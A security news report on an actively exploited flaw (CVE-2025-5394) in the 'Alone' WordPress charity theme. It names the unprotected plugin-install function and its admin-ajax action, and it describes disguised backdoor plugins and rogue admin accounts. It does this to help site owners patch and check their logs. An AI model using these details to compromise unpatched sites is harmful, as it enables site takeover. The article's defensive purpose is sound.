A severe security vulnerability in a widely used WordPress theme, “Alone – Charity Multipurpose Non-profit WordPress Theme,” is being actively exploited by threat actors, top to widespread website hijacks. The critical flaw, identified as CVE-2025-5394 with a CVSS score of 9.8, allows unauthenticated attackers to remotely install malicious plugins and achieve full control over vulnerable sites.
Security researchers at Wordfence credit Thái An with discovering and reporting the bug. The vulnerability stems from a missing capability check in the theme’s alone_import_pack_install_plugin() function, which permits unauthorized users to deploy arbitrary plugins from remote sources via AJAX requests. This oversight essentially provides a backdoor for attackers to upload malicious files, execute remote code, and subsequently take over the compromised websites.
Reports indicate that exploitation attempts began as early as July 12, just two days before the vulnerability was publicly disclosed, suggesting that attackers were closely monitoring code changes for newly addressed flaws. Wordfence alone has already blocked over 120,900 exploit attempts targeting this vulnerability.
In observed attacks, hackers are uploading ZIP archives disguised as legitimate plugins (such as “wp-classic-editor.zip” or “background-image-cropper.zip”). These archives contain PHP-based backdoors designed to execute remote commands, upload additional files, and even create rogue administrator accounts, effectively locking out legitimate site owners. Fully-featured file managers are also being injected, granting attackers complete control over the compromised server.
The developers of the “Alone” theme addressed the vulnerability in version 7.8.5, released on June 16, 2025. WordPress site owners utilizing this theme are strongly urged to update to the latest version immediately. Furthermore, administrators should meticulously check for any suspicious new admin users, review their site logs for requests to /wp-admin/admin-ajax.php action=alone_import_pack_install_plugin, and conduct thorough security scans to identify and remove any lingering malicious files or backdoors. This incident serves as a stark reminder of the ongoing importance of timely updates and robust security practices in the WordPress ecosystem.
![Online Scam Cases Continue to Rise Despite Crackdowns on Foreign Fraud Networks [Myanmar]](https://sumtrix.com/wp-content/uploads/2025/06/30-12-120x86.jpg "Online Scam Cases Continue to Rise Despite Crackdowns on Foreign Fraud Networks [Myanmar]")
